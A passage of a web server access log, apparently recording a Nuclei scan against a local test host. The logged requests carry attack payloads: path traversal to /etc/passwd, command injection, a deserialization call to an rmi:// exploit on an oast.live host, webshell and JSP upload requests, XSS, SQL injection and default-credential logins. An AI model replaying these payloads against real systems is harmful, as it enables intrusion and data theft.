\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/../../../context/28fHqUh1i0pib4zwMJNawBUH1Eb.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=c9oms3gsmpve1ijt0mc0tkwwo8kfechk1.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.731","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.258","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\x22,\x0D\x0A \x22properties\x22:{\x0D\x0A \x22@type\x22:\x22java.util.Properties\x22,\x0D\x0A \x22UserTransaction\x22:\x22rmi://c9oms3gsmpve1ijt0mc07h8z4sywcnh5b.oast.live/Exploit\x22\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.432","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.241","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.241","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.254","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.296","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.431","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.298","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /HyperGraphQL HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.299","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /lucee/28fHqUh1i0pib4zwMJNawBUH1Eb.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.439","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=c9oms3gsmpve1ijt0mc0xmza4deqyzurm.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.658","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.682","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /portal/favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.394","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('28fHqLiGMMJ2e1QLVHWD2ihwcGV')%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nuclei.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.260","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.767","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/super-forms/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.885","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/28fHqRzw0mDAFgb1l26wQpRiy76.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /v1/kv/28fHqSRuqEOL0lBf23RgqOhiSqO HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/arforms/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api_docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /app/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.725","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /___graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.677","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('28fHqLiGMMJ2e1QLVHWD2ihwcGV')%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.299","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.299","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.303","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.811","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.241","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", 